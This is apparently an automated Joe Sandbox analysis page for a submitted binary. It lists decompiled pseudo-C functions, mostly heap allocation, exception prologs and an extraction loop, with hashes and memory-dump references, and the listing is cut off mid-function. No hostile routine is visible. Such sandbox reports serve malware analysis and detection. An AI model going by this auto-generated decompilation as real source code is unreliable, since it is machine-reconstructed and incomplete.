Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 740b8c1b265c6afa102cd28fe47490fa77f3000fb8e4cd3bc1c5651630c40c6a
Instruction ID: a3044d0c36a70d48677a02633e8e8ef254d9ed3ed14f4aa7acc454da17c7eaf8
Opcode Fuzzy Hash: 740b8c1b265c6afa102cd28fe47490fa77f3000fb8e4cd3bc1c5651630c40c6a
Instruction Fuzzy Hash: D7710071504F44AEDB21DB70CC51AEBB7EAAF14301F44496EE1AB87243DB326A48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0006837F Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0006837F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0007E28C(E00091E2A, _t95);
				E0007E360();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00061380(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00069EF7(_t6, __edi, _t93, _t93 + 0xf6) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E000619A6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d34; // -38196
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0006FE56(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0006BAC4(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E000670BF(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0006A4C6(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00068517(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82fa) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x6201)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82fa)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82fa)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x6201));
								_t32 =  *((char*)(_t51 + 0x6201)) == 0;
								__eflags =  *((char*)(_t51 + 0x6201)) == 0;
								E00071359((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf6);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00061F00(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00063AAC(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E0006857B(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00066FC6(0xa0f50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00061631(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x0006837f
0x0006837f
0x0006837f
0x0006837f
0x00068384
0x0006838e
0x00068394
0x00068396
0x0006839f
0x000683a4
0x000683af
0x000683bc
0x000683c4
0x000683ca
0x000683d1
0x000683e4
0x000683eb
0x000683f2
0x000683f5
0x000683f7
0x000683fd
0x00068404
0x0006840b
0x00068412
0x00068417
0x00068432
0x0006843e
0x00068445
0x0006844a
0x00068450
0x00068455
0x00068457
0x0006845e
0x00068465
0x0006846a
0x0006846c
0x00000000
0x00000000
0x0006841f
0x00068425
0x0006842b
0x0006842b
0x0006846e
0x00068474
0x00068474
0x0006847a
0x00068483
0x00068488
0x0006848d
0x0006848e
0x0006848f
0x00068497
0x0006849a
0x000684a1
0x000684a1
0x0006849c
0x0006849c
0x0006849f
0x00000000
0x00000000
0x0006849f
0x000684a8
0x000684ab
0x000684b2
0x000684b4
0x000684c2
0x000684c2
0x000684c9
0x000684c9
0x000684ce
0x000684d4
0x000684d9
0x000684d9
0x000684df
0x000684e4
0x000684e9
0x000684f2
0x000684f7
0x000684f7
0x000684d9
0x000683d3
0x000683da
0x000683da
0x000683d1
0x000684fb
0x00068501
0x0006850c
0x00068516

APIs

__EH_prolog.LIBCMT ref: 00068384

Part of subcall function 00061380: __EH_prolog.LIBCMT ref: 00061385
Part of subcall function 00061380: new.LIBCMT ref: 000613FE

Part of subcall function 000619A6: __EH_prolog.LIBCMT ref: 000619AB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2b9dcacfb713a2483243eb05a7cd416bf6f4b244decc0a82d5f9c318301487db
Instruction ID: a141948aa15aaa9200316fdeefd354033440a0c9f6e433d7a4379cdb589c2df5
Opcode Fuzzy Hash: 2b9dcacfb713a2483243eb05a7cd416bf6f4b244decc0a82d5f9c318301487db
Instruction Fuzzy Hash: 4141B1318406589ADB20EB60CC55BEA73AAAF54300F0480EAE58AA3093DF755BC8DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00061E00 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00061E00(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0007E28C(E00091CCB, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00063B3D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E000616D2(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00061849(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E0007137A( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E000713F5( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00071430();
					}
					E00061849(_t68, E000835B3( *_t68));
					_t49 = 1;
				}
				E000615A0(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00061e00
0x00061e00
0x00061e05
0x00061e0e
0x00061e12
0x00061e15
0x00061e18
0x00061e1b
0x00061e1e
0x00061e21
0x00061e29
0x00061e2f
0x00061e36
0x00061e3e
0x00061e46
0x00061e51
0x00061e54
0x00061e58
0x00061e5e
0x00061e63
0x00061e6d
0x00061e85
0x00061ea6
0x00061e87
0x00061e87
0x00061e8f
0x00061e98
0x00061e98
0x00061e6f
0x00061e6f
0x00061e72
0x00061e74
0x00061e77
0x00061e77
0x00061eb6
0x00061ebc
0x00061ebe
0x00061ec2
0x00061ecd
0x00061ed7

APIs

__EH_prolog.LIBCMT ref: 00061E05

Part of subcall function 00063B3D: __EH_prolog.LIBCMT ref: 00063B42

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1971aacbad9157b9ba84341a99e84b77977e046ad36cd47e27b17275453105d8
Instruction ID: bdf913c683171a887fd405328fdabc2bbe39149d0c2858937291968faa2c318c
Opcode Fuzzy Hash: 1971aacbad9157b9ba84341a99e84b77977e046ad36cd47e27b17275453105d8
Instruction Fuzzy Hash: D4214B71D041099FCF11EF99D9419EEFBF6BF58300B14446EE849A7252CB325E10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0007A7C3 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0007A7C3(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0007E28C(E00092029, _t62);
				_push(_t47);
				E0007E360();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00061380(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00061F4F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00061951(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E000835D3(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0007F4B0(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E000615E7(_t62 - 0x24);
					E00061631(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00061631(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x0007a7c3
0x0007a7c3
0x0007a7c3
0x0007a7c8
0x0007a7cd
0x0007a7d3
0x0007a7d9
0x0007a7da
0x0007a7dd
0x0007a7e7
0x0007a7ea
0x0007a7f8
0x0007a7fc
0x0007a807
0x0007a818
0x0007a81b
0x0007a81e
0x0007a821
0x0007a824
0x0007a82a
0x0007a82e
0x0007a82f
0x0007a835
0x0007a83a
0x0007a83c
0x0007a83e
0x0007a841
0x0007a847
0x0007a84e
0x0007a853
0x0007a855
0x0007a857
0x0007a85d
0x0007a860
0x0007a868
0x0007a859
0x0007a859
0x0007a859
0x0007a873
0x0007a873
0x0007a878
0x0007a883
0x0007a888
0x0007a809
0x0007a80f
0x0007a814
0x0007a814
0x0007a88f
0x0007a89a

APIs

__EH_prolog.LIBCMT ref: 0007A7C8

Part of subcall function 00061380: __EH_prolog.LIBCMT ref: 00061385
Part of subcall function 00061380: new.LIBCMT ref: 000613FE

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 358dbd7d0ccd533e9178c794a008eae53ae21a3231e8e6617c373758c82bb66c
Instruction ID: bfe3b3aafe884e1fb78b4f4c70f9aaf561078cb1ebaeac123101f85d1ca0c4ad
Opcode Fuzzy Hash: 358dbd7d0ccd533e9178c794a008eae53ae21a3231e8e6617c373758c82bb66c
Instruction Fuzzy Hash: B7218B71D04249AACF14DF94C8429EEB7F5AF59300F1444AEE809A7203DB396E06CB65

Uniqueness

Uniqueness Score: -1.00%

Function 000692E6 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000692E6(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0007E28C(E00091F37, _t42);
				E0006709D(_t42 - 0x20, E00067DC6());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0006CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0006CC51( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E0006CA6C( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E000615A0(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}

0x000692e6
0x000692eb
0x000692fd
0x0006930b
0x00069314
0x00069318
0x0006931b
0x0006931f
0x00069322
0x00069322
0x00069324
0x00069325
0x00069327
0x0006932f
0x0006932f
0x00069333
0x0006933c
0x00069343
0x00069344
0x00069346
0x00069346
0x00069356
0x00069358
0x0006935d
0x00069361
0x0006936a
0x00069374

APIs

__EH_prolog.LIBCMT ref: 000692EB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f5fabeff598bef38ace04277e831004863a96f3f2e47c8752aae91ec9cb0fe1b
Instruction ID: db58a62338b03e5e20767d799b19967b22e87bd40013f8702d2ac304bf76b448
Opcode Fuzzy Hash: f5fabeff598bef38ace04277e831004863a96f3f2e47c8752aae91ec9cb0fe1b
Instruction Fuzzy Hash: 6A116173E105389BCF22AFA8CC51DEEB77BEF48750F054125F819B7652DA358E1186A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008BB8A Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0008BB8A(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E000885A9(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E0008A6CA(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E000884DE(0);
				return _t32;
			}

0x0008bb8f
0x0008bb90
0x0008bb97
0x0008bb9c
0x0008bba0
0x0008bba4
0x0008bba7
0x0008bbad
0x0008bbad
0x0008bbb3
0x0008bbb5
0x0008bbb8
0x0008bbb8
0x0008bbbb
0x0008bbbd
0x0008bbc3
0x0008bbc7
0x0008bbcc
0x0008bbd0
0x0008bbd2
0x0008bbd5
0x0008bbdb
0x0008bbe2
0x0008bbe6
0x0008bbea
0x0008bbed
0x0008bbed
0x0008bbf1
0x0008bbf4
0x0008bba9
0x0008bba9
0x0008bba9
0x0008bbf6
0x0008bc03

APIs

Part of subcall function 000885A9: RtlAllocateHeap.NTDLL(00000008,00093958,00000000,?,0008905A,00000001,00000364,?,?,?,0006D25E,?,032445C8,00000063,00000004,0006CFE0), ref: 000885EA

_free.LIBCMT ref: 0008BBF6

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction ID: 68695fcb0df744368f2836681885bf9531a19285bf0fe19d3dd1f23b5e60b75b
Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction Fuzzy Hash: 1501D6722003496BE3319E659C8599AFBE9FB85370F25062DE5D483280EB70A805C764

Uniqueness

Uniqueness Score: -1.00%

Function 000885A9 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E000885A9(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xc16ec, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00088394();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0008895A())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E000871AD(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x000885a9
0x000885af
0x000885b4
0x000885c2
0x000885c2
0x000885c8
0x000885ca
0x000885ca
0x000885e1
0x000885ea
0x000885f2
0x00000000
0x00000000
0x000885d2
0x000885d4
0x000885f6
0x000885fb
0x00088601
0x00000000
0x00088601
0x000885d7
0x000885dc
0x000885dd
0x000885df
0x00000000
0x00000000
0x000885df
0x00000000
0x000885e1
0x000885ba
0x000885bb
0x000885c0
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00093958,00000000,?,0008905A,00000001,00000364,?,?,?,0006D25E,?,032445C8,00000063,00000004,0006CFE0), ref: 000885EA

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: abee92173131a2044de1a71e6bba1dc26d108d1c1c093748573b87edbd5966ef
Instruction ID: 589dc91bcb2eb427c0e8267beff207f62f18b642a5684806eee905aef4568404
Opcode Fuzzy Hash: abee92173131a2044de1a71e6bba1dc26d108d1c1c093748573b87edbd5966ef
Instruction Fuzzy Hash: 15F0E931644A226BEB713F269C05B9B77C8BF417B0B94C111E9D8E6085CE20EE014BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00065BD7 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00065BD7(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0007E28C(E00091D6E, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0006B07D(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0006FE8B();
				 *(_t36 - 4) = 1;
				E0006FE8B();
				 *(_t36 - 4) = 2;
				E0006FE8B();
				 *(_t36 - 4) = 3;
				E0006FE8B();
				 *(_t36 - 4) = 4;
				E0006FE8B();
				 *(_t36 - 4) = 5;
				E00065DCC(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x00065bd7
0x00065bdc
0x00065be1
0x00065be3
0x00065be5
0x00065be8
0x00065bed
0x00065bed
0x00065bf7
0x00065c02
0x00065c06
0x00065c11
0x00065c15
0x00065c20
0x00065c24
0x00065c2f
0x00065c33
0x00065c3a
0x00065c3e
0x00065c49
0x00065c53

APIs

__EH_prolog.LIBCMT ref: 00065BDC

Part of subcall function 0006B07D: __EH_prolog.LIBCMT ref: 0006B082

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8a421ed03dd2045e9d3699f62ebd342e742c13aeb8ee5a0d9a8bbbd64499a730
Instruction ID: ee60bc2be6305cc281760a45ddfb1109d04cf0ef517647d3bce1a09bc52504b5
Opcode Fuzzy Hash: 8a421ed03dd2045e9d3699f62ebd342e742c13aeb8ee5a0d9a8bbbd64499a730
Instruction Fuzzy Hash: C6016D30A05685DAD725F7A4D0553EDFBA59F19740F40819DE86A53283CBB41B08C662

Uniqueness

Uniqueness Score: -1.00%

Function 00088518 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00088518(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0008895A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xc16ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00088394();
					if(__eflags == 0) {
						goto L7;
					}
